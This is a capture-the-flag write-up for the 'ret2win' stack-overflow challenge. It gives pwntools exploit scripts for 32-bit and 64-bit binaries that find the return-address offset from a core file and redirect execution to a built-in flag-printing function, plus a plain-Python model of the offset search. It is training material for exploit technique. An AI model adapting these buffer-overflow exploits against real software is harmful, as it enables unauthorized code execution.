ret2win
Author: ret2basic

32bit

Solution

Typical ret2text. There is an unused function ret2win located in the .text segment that calls system("/bin/cat flag.txt") for us. This is sometimes called "dead code".

Exploit

```python
#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="i386", os="linux")
elf = ELF("ret2win32", checksec=False)

#--------Offset--------#

# Crash the process with a cyclic pattern and read the overwritten
# return address out of the core file. On i386 the garbage address is
# loaded into eip before the fault, so eip holds the pattern bytes.
p = elf.process()
pattern = cyclic(1024)
p.sendlineafter("> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
offset = cyclic_find(core.eip)

log.info(f"{offset = }")

#--------ret2text--------#

# Overwrite the saved return address with the address of the unused
# ret2win function already present in .text.
ret2win = elf.sym["ret2win"]

payload = flat(
    b"A" * offset,
    ret2win,
)

p = elf.process()

p.sendlineafter("> ", payload)

p.interactive()
```

64bit

Solution

The idea is essentially the same as the 32bit case. The one difference is how the offset is read from the core file: on x86-64 an address made of pattern bytes is non-canonical, so the `ret` instruction itself faults before `rip` is updated, and the overwritten return address is read from the top of the stack (`rsp`) instead of from `rip`.

Exploit

```python
#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("ret2win", checksec=False)

#--------Offset--------#

# Crash the process with a cyclic pattern. On amd64 the pattern address
# is non-canonical, so ret faults without updating rip; the overwritten
# return address is still on the stack at rsp, so read it from there.
p = elf.process()
pattern = cyclic(1024)
p.sendlineafter("> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
offset = cyclic_find(core.read(core.rsp, 4))

log.info(f"{offset = }")

#--------ret2text--------#

# Overwrite the saved return address with the address of the unused
# ret2win function already present in .text.
ret2win = elf.sym["ret2win"]

payload = flat(
    b"A" * offset,
    ret2win,
)

p = elf.process()

p.sendlineafter("> ", payload)

p.interactive()
```
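Both exploits lean on pwntools' `cyclic()` / `cyclic_find()` to turn a crash into a stack offset, and the 64-bit version reads the pattern from `rsp` rather than `rip`. The following is an added example, not code from the writeup or from pwntools, that models that step in plain Python: it builds the same de Bruijn pattern, simulates what a core file would expose on each architecture, and recovers the offset both ways. The buffer layouts (`off32=44`, `off64=40`) and the "crash" itself are constructed assumptions for illustration.

```python
#!/usr/bin/env python3
"""Plain-Python model of the offset-finding step (no pwntools).

Assumptions (not from the original writeup): the buffer layouts are
constructed, the crash is simulated, and only the register values a
core file would expose are modelled.
"""
import itertools
import string
import struct

ALPHABET = string.ascii_lowercase.encode()
N = 4  # every N-byte window of the pattern is unique


def _de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the de Bruijn sequence B(k, n) byte by byte (FKM algorithm),
    the construction pwntools' cyclic() is built on."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length):
    """First `length` bytes of the pattern, like pwntools cyclic(length)."""
    return bytes(itertools.islice(_de_bruijn(), length))


def cyclic_find(subseq):
    """Offset of a 4-byte window in the pattern; accepts an int register
    value (decoded little-endian) or bytes, like pwntools cyclic_find()."""
    if isinstance(subseq, int):
        subseq = struct.pack("<I", subseq)
    subseq = bytes(subseq[:N])
    window = bytearray()
    for i, byte in enumerate(_de_bruijn()):
        window.append(byte)
        if len(window) > N:
            del window[0]
        if window == subseq:
            return i - N + 1
    return -1


def is_canonical(addr):
    """x86-64 requires bits 63..47 to be all equal; anything else faults
    inside `ret` itself, before rip is updated."""
    top = addr >> 47
    return top == 0 or top == (1 << 17) - 1


def simulate_crash(pattern, saved_ret_offset, bits):
    """Model what a core file shows after the pattern overwrote the saved
    return address at `saved_ret_offset` (a constructed layout)."""
    width = 4 if bits == 32 else 8
    overwritten = pattern[saved_ret_offset:saved_ret_offset + width]
    if bits == 32:
        # i386: 0x6161xxxx is a legal address, so ret loads it into eip
        # and the fault happens on the fetch; the core records it in eip.
        return {"eip": struct.unpack("<I", overwritten)[0]}
    value = struct.unpack("<Q", overwritten)[0]
    # amd64: a pattern address is never canonical, so ret faults first
    # and rsp still points at the bad return address on the stack.
    assert not is_canonical(value)
    return {"rsp_bytes": overwritten}


def find_offsets(off32=44, off64=40):
    """Recover both offsets the way the two exploits do: 32-bit from eip,
    64-bit from the four bytes at rsp. The default layouts are constructed."""
    pattern = cyclic(1024)
    core32 = simulate_crash(pattern, off32, 32)
    core64 = simulate_crash(pattern, off64, 64)
    return cyclic_find(core32["eip"]), cyclic_find(core64["rsp_bytes"][:4])


if __name__ == "__main__":
    print(find_offsets())
```

`is_canonical()` is the reason the two scripts differ: any 8-byte window of lowercase letters has bits 63..47 that are neither all zero nor all one, so the CPU rejects it at `ret` and the core file's `rip` still points at the `ret` instruction, while `rsp` points at the bytes that were meant to become the return address.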